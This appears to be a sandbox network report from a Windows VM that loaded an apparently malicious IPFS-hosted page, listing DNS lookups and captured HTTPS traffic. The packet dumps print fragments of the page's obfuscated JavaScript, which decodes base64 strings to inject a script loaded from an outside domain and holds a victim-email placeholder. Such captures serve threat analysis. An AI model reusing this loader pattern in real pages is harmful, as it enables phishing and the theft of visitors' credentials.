Jul 11, 2024 00:38:45.536494970 CEST	56705	53	192.168.2.6	1.1.1.1
Jul 11, 2024 00:38:45.543764114 CEST	53	56705	1.1.1.1	192.168.2.6
Jul 11, 2024 00:38:45.548042059 CEST	53	50071	1.1.1.1	192.168.2.6
Jul 11, 2024 00:38:57.359498024 CEST	53	55698	1.1.1.1	192.168.2.6
Jul 11, 2024 00:39:19.946933031 CEST	53	49809	1.1.1.1	192.168.2.6
Jul 11, 2024 00:39:20.355628014 CEST	53	51898	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 11, 2024 00:38:22.433826923 CEST	192.168.2.6	1.1.1.1	0x7195	Standard query (0)	ipfs.io	A (IP address)	IN (0x0001)	false
Jul 11, 2024 00:38:22.434006929 CEST	192.168.2.6	1.1.1.1	0x7eed	Standard query (0)	ipfs.io	65	IN (0x0001)	false
Jul 11, 2024 00:38:22.449309111 CEST	192.168.2.6	1.1.1.1	0x7c9f	Standard query (0)	ipfs.io	A (IP address)	IN (0x0001)	false
Jul 11, 2024 00:38:22.449556112 CEST	192.168.2.6	1.1.1.1	0x9224	Standard query (0)	ipfs.io	65	IN (0x0001)	false
Jul 11, 2024 00:38:23.118355036 CEST	192.168.2.6	1.1.1.1	0xc950	Standard query (0)	cdn.socket.io	A (IP address)	IN (0x0001)	false
Jul 11, 2024 00:38:23.118499041 CEST	192.168.2.6	1.1.1.1	0xe63d	Standard query (0)	cdn.socket.io	65	IN (0x0001)	false
Jul 11, 2024 00:38:23.119050980 CEST	192.168.2.6	1.1.1.1	0x6bf6	Standard query (0)	fiveradio-newbam.com	A (IP address)	IN (0x0001)	false
Jul 11, 2024 00:38:23.119262934 CEST	192.168.2.6	1.1.1.1	0x3282	Standard query (0)	fiveradio-newbam.com	65	IN (0x0001)	false
Jul 11, 2024 00:38:24.614917040 CEST	192.168.2.6	1.1.1.1	0x646c	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jul 11, 2024 00:38:24.615509987 CEST	192.168.2.6	1.1.1.1	0xb529	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jul 11, 2024 00:38:43.119363070 CEST	192.168.2.6	1.1.1.1	0x3c30	Standard query (0)	a.nel.cloudflare.com	A (IP address)	IN (0x0001)	false
Jul 11, 2024 00:38:43.119807005 CEST	192.168.2.6	1.1.1.1	0x178f	Standard query (0)	a.nel.cloudflare.com	65	IN (0x0001)	false
Jul 11, 2024 00:38:43.755583048 CEST	192.168.2.6	1.1.1.1	0x84a9	Standard query (0)	ipfs.tech	A (IP address)	IN (0x0001)	false
Jul 11, 2024 00:38:43.755862951 CEST	192.168.2.6	1.1.1.1	0x513b	Standard query (0)	ipfs.tech	65	IN (0x0001)	false
Jul 11, 2024 00:38:45.536233902 CEST	192.168.2.6	1.1.1.1	0xd0ac	Standard query (0)	ipfs.tech	A (IP address)	IN (0x0001)	false
Jul 11, 2024 00:38:45.536494970 CEST	192.168.2.6	1.1.1.1	0x26e9	Standard query (0)	ipfs.tech	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 11, 2024 00:38:22.441828012 CEST	1.1.1.1	192.168.2.6	0x7195	No error (0)	ipfs.io		209.94.90.1	A (IP address)	IN (0x0001)	false
Jul 11, 2024 00:38:22.444546938 CEST	1.1.1.1	192.168.2.6	0x7eed	No error (0)	ipfs.io			65	IN (0x0001)	false
Jul 11, 2024 00:38:22.456634045 CEST	1.1.1.1	192.168.2.6	0x7c9f	No error (0)	ipfs.io		209.94.90.1	A (IP address)	IN (0x0001)	false
Jul 11, 2024 00:38:22.457480907 CEST	1.1.1.1	192.168.2.6	0x9224	No error (0)	ipfs.io			65	IN (0x0001)	false
Jul 11, 2024 00:38:23.134298086 CEST	1.1.1.1	192.168.2.6	0x3282	No error (0)	fiveradio-newbam.com			65	IN (0x0001)	false
Jul 11, 2024 00:38:23.147367001 CEST	1.1.1.1	192.168.2.6	0xe63d	No error (0)	cdn.socket.io	d2vgu95hoyrpkh.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 11, 2024 00:38:23.156585932 CEST	1.1.1.1	192.168.2.6	0x6bf6	No error (0)	fiveradio-newbam.com		104.21.84.200	A (IP address)	IN (0x0001)	false
Jul 11, 2024 00:38:23.156585932 CEST	1.1.1.1	192.168.2.6	0x6bf6	No error (0)	fiveradio-newbam.com		172.67.196.150	A (IP address)	IN (0x0001)	false
Jul 11, 2024 00:38:23.161449909 CEST	1.1.1.1	192.168.2.6	0xc950	No error (0)	cdn.socket.io	d2vgu95hoyrpkh.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 11, 2024 00:38:23.161449909 CEST	1.1.1.1	192.168.2.6	0xc950	No error (0)	d2vgu95hoyrpkh.cloudfront.net		13.227.219.97	A (IP address)	IN (0x0001)	false
Jul 11, 2024 00:38:23.161449909 CEST	1.1.1.1	192.168.2.6	0xc950	No error (0)	d2vgu95hoyrpkh.cloudfront.net		13.227.219.47	A (IP address)	IN (0x0001)	false
Jul 11, 2024 00:38:23.161449909 CEST	1.1.1.1	192.168.2.6	0xc950	No error (0)	d2vgu95hoyrpkh.cloudfront.net		13.227.219.11	A (IP address)	IN (0x0001)	false
Jul 11, 2024 00:38:23.161449909 CEST	1.1.1.1	192.168.2.6	0xc950	No error (0)	d2vgu95hoyrpkh.cloudfront.net		13.227.219.40	A (IP address)	IN (0x0001)	false
Jul 11, 2024 00:38:24.625581980 CEST	1.1.1.1	192.168.2.6	0x646c	No error (0)	www.google.com		216.58.206.68	A (IP address)	IN (0x0001)	false
Jul 11, 2024 00:38:24.626542091 CEST	1.1.1.1	192.168.2.6	0xb529	No error (0)	www.google.com			65	IN (0x0001)	false
Jul 11, 2024 00:38:35.740103006 CEST	1.1.1.1	192.168.2.6	0xbb91	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 11, 2024 00:38:35.740103006 CEST	1.1.1.1	192.168.2.6	0xbb91	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Jul 11, 2024 00:38:43.135627985 CEST	1.1.1.1	192.168.2.6	0x3c30	No error (0)	a.nel.cloudflare.com		35.190.80.1	A (IP address)	IN (0x0001)	false
Jul 11, 2024 00:38:43.767354965 CEST	1.1.1.1	192.168.2.6	0x84a9	No error (0)	ipfs.tech		185.93.3.244	A (IP address)	IN (0x0001)	false
Jul 11, 2024 00:38:45.548042059 CEST	1.1.1.1	192.168.2.6	0xd0ac	No error (0)	ipfs.tech		169.150.247.39	A (IP address)	IN (0x0001)	false
Jul 11, 2024 00:38:53.731256962 CEST	1.1.1.1	192.168.2.6	0xf9cc	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jul 11, 2024 00:38:53.731256962 CEST	1.1.1.1	192.168.2.6	0xf9cc	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jul 11, 2024 00:39:12.418014050 CEST	1.1.1.1	192.168.2.6	0x4e9d	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.34	A (IP address)	IN (0x0001)	false
Jul 11, 2024 00:39:12.418014050 CEST	1.1.1.1	192.168.2.6	0x4e9d	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.18	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ipfs.io

https:

fiveradio-newbam.com

cdn.socket.io

ipfs.tech

fs.microsoft.com

a.nel.cloudflare.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49715	209.94.90.1	443	2912	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-10 22:38:22 UTC	714	OUT	GET /ipfs/bafkreighlryyquvwncfjki32xkca3dafzoxaan33ptn7lqqb5hzvwz4zfy HTTP/1.1 Host: ipfs.io Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-10 22:38:23 UTC	1071	IN	HTTP/1.1 200 OK Date: Wed, 10 Jul 2024 22:38:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close access-control-allow-headers: Content-Type access-control-allow-headers: Range access-control-allow-headers: User-Agent access-control-allow-headers: X-Requested-With access-control-allow-methods: GET access-control-allow-methods: HEAD access-control-allow-methods: OPTIONS access-control-allow-origin: * access-control-expose-headers: Content-Length access-control-expose-headers: Content-Range access-control-expose-headers: X-Chunked-Output access-control-expose-headers: X-Ipfs-Path access-control-expose-headers: X-Ipfs-Roots access-control-expose-headers: X-Stream-Output Cache-Control: public, max-age=29030400, immutable x-ipfs-path: /ipfs/bafkreighlryyquvwncfjki32xkca3dafzoxaan33ptn7lqqb5hzvwz4zfy x-ipfs-roots: bafkreighlryyquvwncfjki32xkca3dafzoxaan33ptn7lqqb5hzvwz4zfy x-ipfs-pop: rainbow-ny5-04 CF-Cache-Status: HIT Age: 3573093 Server: cloudflare CF-RAY: 8a140b31de1c0cbc-EWR alt-svc: h3=":443"; ma=86400
2024-07-10 22:38:23 UTC	298	IN	Data Raw: 62 35 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 70 6f 69 6e 74 3d 22 61 48 52 30 63 48 4d 36 4c 79 39 6d 61 58 5a 6c 63 6d 46 6b 61 57 38 74 62 6d 56 33 59 6d 46 74 4c 6d 4e 76 62 51 3d 3d 22 20 69 64 3d 22 68 74 6d 6c 22 20 73 74 69 3d 22 56 6c 5a 4f 52 6c 56 71 51 54 4a 4e 52 46 56 35 54 55 52 4a 4d 46 5a 56 4e 55 70 56 56 6c 5a 47 54 56 52 46 65 6b 31 36 51 54 46 4e 52 46 6c 35 54 6d 70 4a 64 30 31 71 55 58 6c 4e 52 45 6b 77 54 55 52 56 64 30 35 71 54 58 70 4e 56 45 56 35 54 6d 63 39 50 51 3d 3d 22 20 76 69 63 3d 22 5b 45 4d 61 69 6c 5d 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 20 69 64 3d 22 61 6c 6c 62 6f 64 79 22 3e 0d 0a 20 20 20 Data Ascii: b5e<!DOCTYPE html><html point="aHR0cHM6Ly9maXZlcmFkaW8tbmV3YmFtLmNvbQ==" id="html" sti="VlZORlVqQTJNRFV5TURJMFZVNUpVVlZGTVRFek16QTFNRFl5TmpJd01qUXlNREkwTURVd05qTXpNVEV5Tmc9PQ==" vic="[EMail]" lang="en"><head></head><body id="allbody">
2024-07-10 22:38:23 UTC	1369	IN	Data Raw: 61 39 35 35 37 65 65 36 65 31 34 33 38 37 33 36 33 3c 2f 44 49 56 3e 20 3c 44 49 56 3e 32 61 65 66 37 36 39 64 63 64 30 65 65 61 33 38 33 66 32 62 3c 2f 44 49 56 3e 20 3c 44 49 56 3e 35 65 34 62 63 32 65 32 39 61 65 39 66 63 66 65 38 32 39 32 3c 2f 44 49 56 3e 20 3c 44 49 56 3e 65 31 65 64 39 65 38 37 65 66 63 37 62 65 37 35 38 36 37 66 3c 2f 44 49 56 3e 20 3c 44 49 56 3e 65 35 38 36 36 34 64 34 34 63 31 32 31 37 33 63 65 34 38 62 3c 2f 44 49 56 3e 20 3c 44 49 56 3e 64 39 33 33 63 66 33 64 62 34 34 39 61 39 39 37 32 62 34 36 3c 2f 44 49 56 3e 20 3c 44 49 56 3e 34 38 34 63 64 62 66 30 32 37 31 35 30 33 36 65 63 37 65 31 3c 2f 44 49 56 3e 20 3c 44 49 56 3e 62 63 64 31 32 37 65 37 36 62 33 61 62 33 63 31 30 35 33 38 3c 2f 44 49 56 3e 20 3c 44 49 56 3e 39 35 Data Ascii: a9557ee6e14387363</DIV> <DIV>2aef769dcd0eea383f2b</DIV> <DIV>5e4bc2e29ae9fcfe8292</DIV> <DIV>e1ed9e87efc7be75867f</DIV> <DIV>e58664d44c12173ce48b</DIV> <DIV>d933cf3db449a9972b46</DIV> <DIV>484cdbf02715036ec7e1</DIV> <DIV>bcd127e76b3ab3c10538</DIV> <DIV>95
2024-07-10 22:38:23 UTC	1250	IN	Data Raw: 35 65 31 34 34 64 61 36 38 61 63 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 61 74 6f 62 28 22 63 32 4e 79 61 58 42 30 22 29 29 3b 0d 0a 20 20 20 20 20 20 20 20 73 31 32 62 62 38 32 39 64 36 32 62 39 64 31 34 37 39 37 66 31 39 35 35 38 65 64 30 39 31 66 39 34 31 64 62 34 36 63 61 37 5f 66 30 61 33 30 64 34 35 64 39 34 36 35 33 32 36 30 37 62 39 65 39 63 37 64 31 38 34 35 35 65 31 34 34 64 61 36 38 61 63 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 61 74 6f 62 28 22 63 33 4a 6a 22 29 2c 20 73 62 65 65 35 38 31 35 64 64 35 32 63 32 35 31 61 64 35 30 39 30 38 34 39 30 30 65 62 31 62 33 61 65 66 66 64 62 61 66 63 20 2b 20 61 74 6f 62 28 22 4c 32 70 7a 62 6d 39 74 4c 6d 70 7a 22 29 29 3b 0d 0a 20 20 20 20 20 20 20 20 73 31 32 62 Data Ascii: 5e144da68ac = document.createElement(atob("c2NyaXB0")); s12bb829d62b9d14797f19558ed091f941db46ca7_f0a30d45d946532607b9e9c7d18455e144da68ac.setAttribute(atob("c3Jj"), sbee5815dd52c251ad509084900eb1b3aeffdbafc + atob("L2pzbm9tLmpz")); s12b
2024-07-10 22:38:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49720	104.21.84.200	443	2912	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-10 22:38:23 UTC	519	OUT	GET /jsnom.js HTTP/1.1 Host: fiveradio-newbam.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://ipfs.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-10 22:38:43 UTC	751	IN	HTTP/1.1 522 Date: Wed, 10 Jul 2024 22:38:43 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=va6lKs5sRIm7VETm2nWIlphmI6Tc6YbKxFUvxA%2FUF%2Bjpd4Y4blytGKPSG%2B2vLIfibY8IcWp5%2BoRdKPz92ntHbDBOXwPXXf5GSbuthgGLnpZNDuuwcja4mHM%2BVpxkaQ3xfWz176VAkw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8a140b363d4dc411-EWR alt-svc: h3=":443"; ma=86400
2024-07-10 22:38:43 UTC	15	IN	Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32 Data Ascii: error code: 522

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49721	13.227.219.97	443	2912	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-10 22:38:23 UTC	548	OUT	GET /4.6.0/socket.io.min.js HTTP/1.1 Host: cdn.socket.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://ipfs.io sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://ipfs.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-10 22:38:24 UTC	702	IN	HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Content-Length: 45806 Connection: close Accept-Ranges: bytes Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000, immutable Content-Disposition: inline; filename="socket.io.min.js" Date: Tue, 16 Apr 2024 12:40:01 GMT ETag: "80f5b8c6a9eeac15de93e5a112036a06" Server: Vercel Strict-Transport-Security: max-age=63072000 X-Vercel-Cache: HIT X-Vercel-Id: fra1::vz9z2-1713271201165-3be2b8c00140 X-Cache: Hit from cloudfront Via: 1.1 1b0117d337408839a32bf2a49b55b3f0.cloudfront.net (CloudFront) X-Amz-Cf-Pop: AMS54-C1 X-Amz-Cf-Id: XReDsF8X2MRnLStOTsdbcvBFcTZlMs_vKjsXP13XV7nAJIKyNzvM7A== Age: 7379903
2024-07-10 22:38:24 UTC	16384	IN	Data Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 36 2e 30 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 33 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 65 29 3a 28 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 Data Ascii: /! Socket.IO v4.6.0 * (c) 2014-2023 Guillermo Rauch * Released under the MIT License. */!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof g
2024-07-10 22:38:24 UTC	10748	IN	Data Raw: 6c 65 3d 21 31 3b 66 6f 72 28 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 2c 69 3d 6e 3d 3d 3d 74 2e 6c 65 6e 67 74 68 2d 31 3b 45 28 72 2c 65 2e 73 75 70 70 6f 72 74 73 42 69 6e 61 72 79 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 65 2e 77 73 2e 73 65 6e 64 28 74 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 26 26 69 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 77 72 69 74 61 62 6c 65 3d 21 30 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 64 72 61 69 6e 22 29 7d 29 2c 65 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 29 7d 29 29 7d 2c 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 6e 28 72 29 7d 7d 2c 7b 6b 65 79 3a 22 64 6f 43 6c 6f 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 6f Data Ascii: le=!1;for(var n=function(n){var r=t[n],i=n===t.length-1;E(r,e.supportsBinary,(function(t){try{e.ws.send(t)}catch(t){}i&&it((function(){e.writable=!0,e.emitReserved("drain")}),e.setTimeoutFn)}))},r=0;r<t.length;r++)n(r)}},{key:"doClose",value:function(){vo
2024-07-10 22:38:24 UTC	16384	IN	Data Raw: 63 65 68 6f 6c 64 65 72 3a 21 30 2c 6e 75 6d 3a 6e 2e 6c 65 6e 67 74 68 7d 3b 72 65 74 75 72 6e 20 6e 2e 70 75 73 68 28 65 29 2c 72 7d 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 7b 66 6f 72 28 76 61 72 20 69 3d 6e 65 77 20 41 72 72 61 79 28 65 2e 6c 65 6e 67 74 68 29 2c 6f 3d 30 3b 6f 3c 65 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 69 5b 6f 5d 3d 62 74 28 65 5b 6f 5d 2c 6e 29 3b 72 65 74 75 72 6e 20 69 7d 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 28 65 29 26 26 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 44 61 74 65 29 29 7b 76 61 72 20 73 3d 7b 7d 3b 66 6f 72 28 76 61 72 20 61 20 69 6e 20 65 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 61 29 26 26 28 73 5b 61 5d 3d Data Ascii: ceholder:!0,num:n.length};return n.push(e),r}if(Array.isArray(e)){for(var i=new Array(e.length),o=0;o<e.length;o++)i[o]=bt(e[o],n);return i}if("object"===t(e)&&!(e instanceof Date)){var s={};for(var a in e)Object.prototype.hasOwnProperty.call(e,a)&&(s[a]=
2024-07-10 22:38:24 UTC	2290	IN	Data Raw: 6e 20 74 28 29 7d 29 29 2c 74 68 69 73 2e 73 75 62 73 2e 6c 65 6e 67 74 68 3d 30 2c 74 68 69 73 2e 64 65 63 6f 64 65 72 2e 64 65 73 74 72 6f 79 28 29 7d 7d 2c 7b 6b 65 79 3a 22 5f 63 6c 6f 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 3d 21 30 2c 74 68 69 73 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6e 67 3d 21 31 2c 74 68 69 73 2e 6f 6e 63 6c 6f 73 65 28 22 66 6f 72 63 65 64 20 63 6c 6f 73 65 22 29 2c 74 68 69 73 2e 65 6e 67 69 6e 65 26 26 74 68 69 73 2e 65 6e 67 69 6e 65 2e 63 6c 6f 73 65 28 29 7d 7d 2c 7b 6b 65 79 3a 22 64 69 73 63 6f 6e 6e 65 63 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 63 6c 6f 73 65 28 29 7d 7d 2c 7b 6b 65 79 3a Data Ascii: n t()})),this.subs.length=0,this.decoder.destroy()}},{key:"_close",value:function(){this.skipReconnect=!0,this._reconnecting=!1,this.onclose("forced close"),this.user&&this.user.close()}},{key:"disconnect",value:function(){return this._close()}},{key:

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.6	49719	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2024-07-10 22:38:24 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 69 2b 78 6a 43 30 4e 64 49 6b 4f 61 58 6f 2f 47 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 36 62 65 66 65 37 61 30 63 66 38 37 35 31 66 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: i+xjC0NdIkOaXo/G.1Context: 96befe7a0cf8751f
2024-07-10 22:38:24 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-07-10 22:38:24 UTC	1064	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 69 2b 78 6a 43 30 4e 64 49 6b 4f 61 58 6f 2f 47 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 36 62 65 66 65 37 61 30 63 66 38 37 35 31 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 38 45 74 69 52 70 6f 6a 42 44 67 72 66 53 47 68 73 78 45 53 4f 4a 65 54 58 44 73 66 41 33 42 32 6f 5a 33 4e 2b 67 6a 53 4f 57 4f 56 47 51 44 4e 46 53 56 6f 4b 4f 44 4f 48 2f 32 72 74 41 74 46 6c 53 42 47 63 6c 72 72 6e 42 4e 53 54 6a 70 66 6c 4a 2b 6d 38 6d 67 58 69 6c 37 46 39 69 49 79 57 56 31 4f 31 59 4b 34 6d 59 77 32 Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: i+xjC0NdIkOaXo/G.2Context: 96befe7a0cf8751f<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAe8EtiRpojBDgrfSGhsxESOJeTXDsfA3B2oZ3N+gjSOWOVGQDNFSVoKODOH/2rtAtFlSBGclrrnBNSTjpflJ+m8mgXil7F9iIyWV1O1YK4mYw2
2024-07-10 22:38:24 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 69 2b 78 6a 43 30 4e 64 49 6b 4f 61 58 6f 2f 47 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 36 62 65 66 65 37 61 30 63 66 38 37 35 31 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: i+xjC0NdIkOaXo/G.3Context: 96befe7a0cf8751f<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-07-10 22:38:24 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
